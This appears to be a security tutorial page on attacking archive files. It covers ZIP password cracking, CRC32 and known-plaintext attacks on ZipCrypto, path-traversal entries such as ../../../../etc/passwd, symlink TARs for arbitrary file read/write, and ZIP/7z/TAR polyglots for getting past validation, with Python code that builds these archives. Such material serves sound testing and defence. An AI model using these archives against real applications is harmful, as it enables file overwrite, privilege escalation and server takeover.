Archives
Different kinds of file archives, like ZIP, RAR or TAR
Sometimes a ZIP file can be corrupted, either intentionally or unintentionally. You can try to fix it using the -FF flag in zip.
Sometimes binwalk can also help with finding files in the ZIP when unzip cannot.
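To give an idea of what such a scan does, here is a minimal Python sketch (not binwalk itself) that searches raw bytes for ZIP local file headers and prints the filenames it finds. The names scan_local_headers and make_broken_zip are made up for this illustration, and the demo archive is built in memory with its central directory cut off to simulate corruption.

```python
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"
# signature, version, flags, method, mtime, mdate, crc32,
# compressed size, uncompressed size, name length, extra length
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")


def scan_local_headers(data: bytes):
    """Yield (offset, filename, compressed_size) for every local file header found."""
    pos = data.find(LOCAL_HEADER_SIG)
    while pos != -1:
        if pos + LOCAL_HEADER.size <= len(data):
            fields = LOCAL_HEADER.unpack_from(data, pos)
            csize, name_len = fields[7], fields[9]
            name_start = pos + LOCAL_HEADER.size
            name = data[name_start:name_start + name_len]
            yield pos, name.decode("utf-8", "replace"), csize
        pos = data.find(LOCAL_HEADER_SIG, pos + 1)


def make_broken_zip() -> bytes:
    """Build a small ZIP in memory and cut off its central directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "hello")
        zf.writestr("flag.txt", "secret")
    data = buf.getvalue()
    return data[:data.find(b"PK\x01\x02")]  # drop central directory and end record


if __name__ == "__main__":
    for offset, name, csize in scan_local_headers(make_broken_zip()):
        print(f"{offset:#06x}  {name}  ({csize} compressed bytes)")
```

The signature can also occur by chance inside compressed data, so treat hits as candidates rather than guaranteed entries.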
When you suspect some kind of file trickery you should look at the file format, and find things that are weird about this ZIP file.
Password Protection
Most types of archive files can set a password that encrypts the content until the correct password is given. There are a few tricks to brute-force or even bypass this password protection.
I spent a lot of time automating the cracking of password-protected archives in my default tool:
It will automatically recognize the type of encryption used and start hashcat or john to crack it using a wordlist.
Doing it manually would require you to first get a hash using a tool like zip2john, included in John the Ripper. Then you crack that hash with hashcat or john if you have the right hash mode.
An interesting little thing about most archive file formats is the fact that when they are encrypted, you can still read the filenames and structure, only the content is encrypted. This can already give a good idea of what kind of files the archive contains.
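A minimal Python sketch of reading that metadata without any password is shown below. It uses the standard zipfile module. The function name describe_entries and the demo archive are assumptions for illustration. Python's zipfile cannot write encrypted ZIPs, so the demo uses an unencrypted stand-in, but the same call works on a protected file.

```python
import io
import zipfile


def describe_entries(zip_source):
    """Return (name, size, crc32_hex, is_encrypted) per entry without decrypting."""
    rows = []
    with zipfile.ZipFile(zip_source) as zf:
        for info in zf.infolist():
            encrypted = bool(info.flag_bits & 0x1)  # bit 0 of the general purpose flags
            rows.append((info.filename, info.file_size, f"{info.CRC:08x}", encrypted))
    return rows


if __name__ == "__main__":
    # Stand-in archive built in memory; point describe_entries() at a real
    # password-protected ZIP to see the encrypted flag set to True.
    demo = io.BytesIO()
    with zipfile.ZipFile(demo, "w") as zf:
        zf.writestr("secret/flag.txt", "flag{example}")
    for row in describe_entries(demo):
        print(row)
```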
Even the size and a CRC32 of each file are present. This CRC is a checksum of the unencrypted file content, so if you can guess the content you can confirm it by computing its CRC32 and comparing the two. This allows for brute-forcing the content of very small files as well. See this tool for an implementation of that:
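As a rough illustration of the idea (this is not the tool referenced above), the following Python sketch tries every candidate of a known length and keeps those whose CRC32 matches. The function name crack_by_crc and the default alphabet are assumptions. In practice the target CRC and length come from the archive listing.

```python
import itertools
import string
import zlib


def crack_by_crc(target_crc: int, length: int,
                 alphabet: str = string.ascii_lowercase + string.digits):
    """Return every candidate of the given length whose CRC32 equals target_crc."""
    matches = []
    for combo in itertools.product(alphabet.encode(), repeat=length):
        candidate = bytes(combo)
        if zlib.crc32(candidate) == target_crc:
            matches.append(candidate)
    return matches


if __name__ == "__main__":
    # Simulate a 3-byte encrypted file whose CRC32 we read from the listing.
    target = zlib.crc32(b"k3y")
    print(crack_by_crc(target, length=3))
```

The search space grows exponentially with the length, and longer contents produce CRC collisions, so this only stays practical and unambiguous for a handful of bytes.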
The PKZIP stream cipher is vulnerable to a Known Plaintext attack. This means that if we know some content of a file in the encrypted ZIP, we can use it to find the keys used to decrypt the rest.
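To see why known content helps, here is a small Python sketch of the legacy PKZIP cipher as described in the ZIP specification. Three 32-bit keys are updated with every plaintext byte, and each ciphertext byte is the plaintext XORed with a keystream byte. The class name ZipCrypto is made up for this illustration. The 12-byte encryption header that real archives prepend is left out, and this is not the attack itself, only the cipher it targets.

```python
# CRC32 lookup table (reflected polynomial 0xEDB88320)
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)


def crc32_step(crc: int, byte: int) -> int:
    """One raw CRC32 register update, without the usual pre/post inversion."""
    return (crc >> 8) ^ CRC_TABLE[(crc ^ byte) & 0xFF]


class ZipCrypto:
    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self._update(b)

    def _update(self, plain_byte: int) -> None:
        self.k0 = crc32_step(self.k0, plain_byte)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = crc32_step(self.k2, self.k1 >> 24)

    def _stream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._stream_byte())
            self._update(p)  # the key state depends on the plaintext
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._stream_byte()
            self._update(p)
            out.append(p)
        return bytes(out)


if __name__ == "__main__":
    plain = b"<?xml version=\"1.0\"?>"
    cipher = ZipCrypto(b"hunter2").encrypt(plain)
    # Known plaintext XOR ciphertext reveals keystream bytes directly
    keystream = bytes(c ^ p for c, p in zip(cipher, plain))
    print(keystream.hex())
```

The recovered keystream bytes constrain the internal key state, which is what a known plaintext attack works backwards from.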
With a faster brute-force attack afterward it is also possible to recover the original password for further use.
The bkcrack tool has a great implementation of this attack, see the tutorial here on how to use it:
When creating your own archives that some target processes, you can include malicious filenames like ../../../../etc/passwd to overwrite or create local files outside the intended directory. This attack surface exists wherever an application has an import feature or automatically extracts archives you upload.
While the most common format is ZIP, this vulnerability exists in many more archive types, like .tar, .jar, .war, .cpio, .apk, .rar or .7z.
Filenames in ZIP files can include folders because a ZIP file may contain folders, but the unexpected functionality is that they may even contain ../ sequences, with no limit on how many. Most popular archive extraction functions (from libraries) are safe from this because they explicitly normalize or forbid these paths, but custom implementations could very well be vulnerable.
The main pattern to look out for is:
Looping through the elements
Concatenating the target directory with the filename directly
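The pattern above can be sketched in Python as follows. Both function names are made up for this illustration: extract_unsafe shows the vulnerable shape (a hand-rolled loop instead of the library's own extract function), and is_inside is one possible check that a custom extractor could apply before writing.

```python
import os
import zipfile


def extract_unsafe(zip_path: str, dest: str) -> None:
    """VULNERABLE: trusts entry names, so '../' sequences escape dest."""
    with zipfile.ZipFile(zip_path) as zf:
        for name in zf.namelist():             # 1. looping through the elements
            target = os.path.join(dest, name)  # 2. concatenating directly
            if name.endswith("/"):
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as out:
                out.write(zf.read(name))


def is_inside(dest: str, name: str) -> bool:
    """Return True if joining name onto dest stays within dest."""
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, name))
    return os.path.commonpath([root, target]) == root
```

When reviewing code, the absence of a check like is_inside between the join and the write is the signal to look for.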
To test for and exploit such a vulnerability, simply create a file entry with a custom name:
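One way to do this is with Python's zipfile module, which stores the entry name you give it verbatim when writing. The sketch below is a minimal example. The function name build_traversal_zip, the decoy entry and the placeholder content are assumptions for illustration.

```python
import zipfile


def build_traversal_zip(out, entry_name: str, content: bytes) -> None:
    """Write a ZIP (to a path or file object) containing entry_name as given."""
    with zipfile.ZipFile(out, "w") as zf:
        zf.writestr("readme.txt", b"nothing to see here\n")  # harmless decoy entry
        zf.writestr(entry_name, content)  # the name is not sanitized on write
```

Calling build_traversal_zip("payload.zip", "../../../../etc/passwd", b"placeholder\n") writes a payload.zip whose second entry carries the traversal path. Python's own extract functions sanitize such names again on extraction, so test against the target's extractor rather than your own.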
Aside from directory traversal in filenames as shown above, most formats can even include symbolic links that point to another path. When extracted, most libraries or commands will correctly recognize and create these symlinks, but such special files can have weird side effects.
Processes afterward might read/write to this file but accidentally follow the symlink we created while doing so. This can result in arbitrary file read/write with multiple steps.
Tip: You can even include multiple file entries with the same name, allowing for even more complex attacks. See here for an example that writes a symlink, and then overwrites its contents from within the same TAR file
When using zip to include a symlink you made, it will by default follow the symlink and include the content of the file it is pointing to. This may be useful for Linux Privilege Escalation when an application zips a symlink you make locally, but in a scenario where it only extracts the file, you should keep the symlink intact inside the ZIP file using the --symlinks option.
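If you prefer to build such an archive programmatically, the same kind of entry can be sketched with Python's zipfile module by marking the entry as a Unix symlink in its external attributes and storing the link target as its data. The function name add_symlink and the example paths are assumptions for illustration.

```python
import io
import stat
import zipfile


def add_symlink(zf: zipfile.ZipFile, name: str, target: str) -> None:
    """Store name as a symlink entry pointing at target."""
    info = zipfile.ZipInfo(name)
    info.create_system = 3  # 3 = Unix, so the mode bits below are meaningful
    info.external_attr = (stat.S_IFLNK | 0o777) << 16  # upper 16 bits hold st_mode
    zf.writestr(info, target)  # the entry's data is the link target path


if __name__ == "__main__":
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        add_symlink(zf, "link.txt", "/etc/passwd")
    with zipfile.ZipFile(buf) as zf:
        info = zf.getinfo("link.txt")
        print(stat.S_ISLNK(info.external_attr >> 16), zf.read("link.txt"))
```

Whether the entry is restored as a real symlink depends on the extractor: Python's own zipfile, for example, writes a regular file containing the target path instead.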
By default, the tar command will allow storing and extracting symlinks.
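A comparable archive can be built without touching the filesystem using Python's tarfile module. The sketch below is a minimal example. The function name build_symlink_tar, its optional overwrite parameter (which appends a second entry reusing the same name, as in the tip above) and the example paths are assumptions for illustration.

```python
import io
import tarfile
from typing import Optional


def build_symlink_tar(link_name: str, target: str,
                      overwrite: Optional[bytes] = None) -> bytes:
    """Return a TAR holding a symlink entry, optionally followed by a same-named file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        link = tarfile.TarInfo(link_name)
        link.type = tarfile.SYMTYPE  # mark the entry as a symbolic link
        link.linkname = target       # where the link points after extraction
        tar.addfile(link)
        if overwrite is not None:
            # Second entry with the same name as the symlink
            dup = tarfile.TarInfo(link_name)
            dup.size = len(overwrite)
            tar.addfile(dup, io.BytesIO(overwrite))
    return buf.getvalue()


if __name__ == "__main__":
    data = build_symlink_tar("uploads/avatar.png", "/etc/passwd")
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        for member in tar.getmembers():
            print(member.name, "->", member.linkname, member.issym())
```

Whether a second same-named entry is written through the link or replaces it depends entirely on the extractor, so this needs testing per target.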
A "polyglot" is defined in English as a person who speaks multiple languages. When talking about file formats, this means a file that can be interpreted in multiple ways. These are useful for various reasons, mainly confusing parsers. A check might use one parser, but when the file is actually used it is parsed differently, bypassing the check.
Archive files have a few interesting properties of flexibility that make it fairly straightforward to create one file that extracts in two different ways depending on the tool used to inspect/extract it.
To understand why tricks work and to come up with your own, look at the @corkami/pics repository which has simple but useful images for many file formats, including archives.
When some code tries to validate a ZIP file before extracting it, there is a high chance you can confuse it so that the check parses the file differently than the extraction does. One such example is combining ZIP files with 7z. This is possible because a ZIP file is parsed from the end, while a .7z file is parsed from the start, where it is recognized by its magic bytes.
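The difference in where each format is recognized can be sketched in a few lines of Python. The function names are made up for this illustration, and the demo prefix is only the 7z signature plus padding rather than a valid .7z archive, so it shows the detection logic and nothing more.

```python
import io
import zipfile

SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"  # signature at the very start of a .7z file
ZIP_EOCD_SIG = b"PK\x05\x06"          # ZIP end of central directory record


def looks_like_7z(data: bytes) -> bool:
    """7z is recognized by its magic bytes at offset 0."""
    return data.startswith(SEVENZ_MAGIC)


def find_zip_eocd(data: bytes) -> int:
    """ZIP readers search backwards from the end; return the offset or -1."""
    # The record is 22 bytes plus an optional comment of up to 65535 bytes
    window_start = max(0, len(data) - (22 + 0xFFFF))
    return data.rfind(ZIP_EOCD_SIG, window_start)


if __name__ == "__main__":
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("innocent.txt", "hello")
    plain_zip = buf.getvalue()
    combined = SEVENZ_MAGIC + b"\x00" * 26 + plain_zip
    print(looks_like_7z(plain_zip), find_zip_eocd(plain_zip) != -1)
    print(looks_like_7z(combined), find_zip_eocd(combined) != -1)
```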
A useful tool that can help us with this is truepolyglot, which has a zipany mode that can prefix a ZIP file with any content, and fix the offsets so it unzips without any errors. When we prefix a regular ZIP file with a 7z file, it will result in a special polyglot file that is a valid ZIP with some content, but 7z x extracts it with the .7z's content. This confusion may bypass some checks.
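As a stand-in for what the prefixing step achieves (this is not truepolyglot), Python's zipfile module can append a new archive to existing data when opened in append mode, recording offsets relative to the start of the whole file. The function names below are made up for this illustration, and the prefix in the demo is a placeholder rather than a real .7z file.

```python
import io
import struct
import zipfile


def prefix_zip(prefix: bytes, files: dict) -> bytes:
    """Return prefix followed by a ZIP whose offsets already account for the prefix."""
    buf = io.BytesIO()
    buf.write(prefix)
    # Mode "a" on data that is not yet a ZIP appends a new archive to it and
    # records entry offsets relative to the start of the whole file.
    with zipfile.ZipFile(buf, "a") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def first_stored_offset(data: bytes) -> int:
    """Read the local-header offset stored in the first central directory record."""
    cd = data.find(b"PK\x01\x02")
    return struct.unpack_from("<I", data, cd + 42)[0]


if __name__ == "__main__":
    # Placeholder prefix: only the 7z signature plus padding, not a real .7z file.
    prefix = b"7z\xbc\xaf\x27\x1c" + b"\x00" * 58
    polyglot = prefix_zip(prefix, {"innocent.txt": b"nothing to see here\n"})
    print(zipfile.ZipFile(io.BytesIO(polyglot)).namelist())
    print(first_stored_offset(polyglot), len(prefix))
```

With a genuine .7z file as the prefix, the result would be the kind of file described above: the stored offset equals the prefix length, so strict ZIP readers do not complain about extra leading bytes.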
The result is a polyglot.zip file with the properties described above: ZIP parsers think it is an innocent file, but it has different contents when extracted using 7z x.
In the previous trick, we learned that ZIP gets parsed from the end of the file. This can bypass most parsers and doesn't require the first bytes of the file to be the magic bytes. In specific cases, however, this might not be enough, and you do need control over the start of the file, for example to set the ZIP magic bytes. Then the trick above wouldn't work because the .7z format requires its own magic bytes there.
To solve this, TAR can be used, which, like ZIP, does not require magic bytes at the start of the file. When you create a raw .tar file using tar -cf, you may notice that it immediately starts with the filename you added.
This can be abused by replacing this filename with the ZIP magic bytes, which will happily be parsed as a filename. With these bytes in place, the file passes a magic bytes check at its start, and during extraction, the rest of the files in the TAR will still be extracted.
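A minimal Python sketch of this idea is shown below. Instead of patching bytes in an existing file (which would also invalidate the header checksum), it creates the first entry with the magic bytes as its name so that tarfile computes a valid header. The function name build_magic_tar and the example payload are assumptions for illustration, and the later step of wrapping the result into a ZIP is not covered.

```python
import io
import tarfile

ZIP_MAGIC = b"PK\x03\x04"


def build_magic_tar(payload_name: str, payload: bytes) -> bytes:
    """Return a TAR whose first bytes are the ZIP magic, followed by a real entry."""
    buf = io.BytesIO()
    # USTAR keeps the header layout simple: the name field starts at offset 0
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        decoy = tarfile.TarInfo(ZIP_MAGIC.decode("latin-1"))  # empty file named PK\x03\x04
        tar.addfile(decoy)
        real = tarfile.TarInfo(payload_name)
        real.size = len(payload)
        tar.addfile(real, io.BytesIO(payload))
    return buf.getvalue()


if __name__ == "__main__":
    data = build_magic_tar("shell.php", b"<?php echo 'example'; ?>")
    print(data[:8])  # name field of the first header, starting with the magic
    with tarfile.open(fileobj=io.BytesIO(data)) as tar:
        print(tar.getnames())
```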
The shell.tar file will have the correct magic bytes already, which are kept after the truepolyglot step in the final polyglot.zip file. This will have ZIP magic bytes, be a valid parsable ZIP file, and at the same time be recognized as TAR by 7z. See the following demo:
The directory traversal example above will create a ZIP file payload.zip that, when extracted by a vulnerable application, will try to overwrite /etc/passwd with the content you choose. This can be useful if root executes it for a Privilege Escalation scenario, but more commonly you'll want to get initial access by overwriting executable files like PHP shells, templates, dotfiles, or ~/.ssh/authorized_keys if SSH is enabled.